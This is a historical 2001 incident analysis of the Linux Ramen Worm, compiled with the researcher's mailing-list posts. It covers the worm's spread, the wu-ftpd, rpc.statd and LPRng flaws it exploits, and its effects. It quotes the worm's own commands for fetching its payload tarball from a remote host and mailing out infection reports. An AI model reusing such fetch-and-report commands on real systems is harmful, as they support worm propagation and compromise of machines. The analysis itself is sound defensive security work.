In 2001 am prins , analizat , disecat primul malware de linux cu autoreplicare ce a primit numele de Ramen Worm. La vremea respectiva au aparut articole in toate publicatiile online majore. Aceasta analiza este pastrata aici din motive istorice in primul rind.
Ramen Worm - General Details ============================== 1. Is this realy a worm ? Yes it is . 2. Why ? It has multiplication ability and it does not infect executables file in order to multiplicate so it can not be considered a Virus . 3. Multiplication technique : It will scan whole networks ( random B class networks XXX.XXX.0.0/255.255.0.0 in order find vulnerable systems. Once a vulnerable system is found it will take control of it ( the worm will have root access on compromised machine) , copy itself to the target , and start scanning . 4. Vulnerabilities exploited by the worm wu-ftpd version 2.6.0 LPRng format vulnerability rpc.statd vulnerability 5. Systems Affected Strings found in the worm indicates that the following systems are targeted : Redhat 6.0 - (knfsd-1.2.2-4) Redhat 6.1 - (knfsd-1.4.7-7) Redhat 6.2 - (nfs-utils-0.1.6-2) RedHat 7.0 - Guinesss-dev RedHat 7.0 - Guinesss but can be affected any other linux running wu-ftpd 2.6.0 or rpc.statd 6. Systems that are not affected Win 9x , Win NT , Win 2000 Non X86 Unixes. 7. Worm effects a) Once a system is compromised the worm will find and replace any index.html file with one file carried inside worm . b) it will disable on compromised machine FTP anonymous access to the machine ( my oppinion this is a "bug" in the worm ) c) it will disable and erase rpc.statd from the compromised machine d) it will disable and erase lpd deamon from the compromised machine so any printing on that machine will be impossibe . e) it will modify inetd.conf on RedHat 6.x and xinetd.conf on RedHat 7.0 and install a fake webserver on a non standard port (my oppinion it can contain also a buffer overflow exploitable remotely. But i could't prove that yet). By installing this it allows the spread of the worm. f) it will remove /etc/hosts.deny g) it will modify /etc/rc.d/rc.sysinit allowing the worm to be started each time machine is rebooted . h) it will send mail to the following addreses ( this 2 mail addreses and a password "bl3h" were encrypted in the worm ) email@example.com firstname.lastname@example.org i) Once worm starts scanning it will consume a large amount of your internet bandwidth. The scanning is verry fast due to usage of synscan technique . j) Once the system is rebooted it will restart scanning . 8. Spreading The worm is spreading very fast due to his very fast Class B network scanning technique . On our network (10 Mb / sec) the hub was in limitation and the whole bandwidth was consummed. It scanned 2 "B classes" in 15 minutes. 9. Danger The worm itself seemns is dangerous due to network bandwith consumation , and due to posibility ( not proved yet ) of remote accessing the compromised box by the worm author. 10. Percentage of boxes vulnerable There are many boxes vulnerable. It is quite common that Redhat 6.2 or Redhat 7.0 to be installed "standard" making them vulnerable to this worm. My estimation is that in a class B network worm will find at least 10-20 vulnerable boxes. My Original postings to BugTraq: ================================ ================================================================================= ================================================================================= Subject: sunrpc / wu-ftpd worm ? Date: Mon, 15 Jan 2001 22:41:50 +0200 From: Mihai Moldovanu mihaim AT PROFM dot RO Organization: Radio ProFM To: INCIDENTS at SECURITYFOCUS DOT COM References: 1 Cristian Dumitrescu wrote: > Hey > I've been experiencing the same kind of scans in the last 2 weeks, with > increased density in the last days, from these ip addreses: > > 18.104.22.168 > 22.214.171.124 > 126.96.36.199 > 188.8.131.52 > 184.108.40.206 > 220.127.116.11 > 18.104.22.168 > 22.214.171.124 > 126.96.36.199 > > 188.8.131.52 > > 184.108.40.206 > > 220.127.116.11 > > 18.104.22.168 > > 22.214.171.124 > > 126.96.36.199 Same problems here : 188.8.131.52 184.108.40.206 220.127.116.11 18.104.22.168 But the most interesting is : 22.214.171.124 wich seems to be a worm launcher site . It will connect to the taget machine on 111 or 21 and will exploit the well known rpc.statd and wu-ftp 2.6.0 bug to gain root on the remote machine. The tar itself is downloaded from the that machine on port 27374 . " lynx -source http://%s:27374 > /usr/src/.poop/ramen.tgz " After a succesfull install it seems it will send a mail with the command : " echo Eat Your Ramen! | mail -s % % " to some obscure hotmail.com account . It seems that it has some sort of class B scanner and exploits for rpc.statd and wu-ftpd If anyone is interested in taking a deeper look in it mail me and i will send the .tgz or you can get it from the site i mentioned above. Best Regards, -- Lead programmer, Mihai Moldovanu (mihaim at profm dot ro) WEB: http://tfm.profm.ro/ http://www.slashdot.ro/ ================================================================================= ================================================================================= Subject: Re: anyone else seen an increase in sunrpc scans these days? Date: Mon, 15 Jan 2001 14:40:16 +0200 From: Mihai Moldovanu mihaim at profm dot ro Organization: Radio ProFM To: INCIDENTS at SECURITYFOCUS dot COM References: 1 Jason Lewis wrote: > I couldn't find any of those addresses, but I have similar scans in my logs. > > 126.96.36.199 > 188.8.131.52 > 184.108.40.206 > 220.127.116.11 > 18.104.22.168 Yes . The same problem here . But not only 111 . 21 also. We deployed a honnypot and waited to be compromised. It took 12 hours to be compromised. I took it out of the network and this is what i found on it : It seemns like a worm that installs StatDXscan ( Class B rpc.statd scanner) , wu-ftpd scanner , a modified t0rn rootkit along with Adore LKM rootkit , and flood tools : Sl2 , smurf5 , tojaned sshd running on port 48480 ) t0rnscan has inside it the following string: irc.webbernet.net:6667 -- Lead programmer, Mihai Moldovanu (mihaim at profm dot ro) WEB: http://tfm.profm.ro/ http://www.developers.ro/ ================================================================================= ================================================================================= Subject: Ramen worm . More details on it. ( found a password and e-mails crypted inside it) Date: Tue, 16 Jan 2001 22:19:30 +0200 From: Mihai Moldovanu mihaim at profm dot ro Organization: Radio ProFM To: INCIDENTS at SECURITYFOCUS dot COM References: 1 I completed reverse engineering the ramen worm. There are 3 crypted text messages in the worm : 2 are email addresses : Decrypted: "email@example.com" , in executable -> "fa20226?gnsl`hk-bnl" Decrypted: "firstname.lastname@example.org" , in executable -> "fa20226?x`gnn-bnl" and a crypted password : Decrypted "bl3h" , in executable -> "ak2g" This texts can be found in almost all ELF worm executables. Crypting algorithm is verry easy. For each characted in crypted text add 1 and you will obtain the plain text i used the following C code to decrypt : for (i= 0 ;i < strlen(text) ;i++) a[i] = a[i] +1; The asp executable ( the one wich get's installed in /sbin/asp and serve requests on 27374 ) has a strange getline function coded wich seems to be specialy crafted to allow remote upload / execution of code . Unfortunately I can't prove that function have a buffer overflow in it . -- Lead programmer, Mihai Moldovanu (mihaim at profm dot ro) WEB: http://www.tfm.ro http://linux.tfm.ro http://portal.tfm.ro http://www.slashdot.ro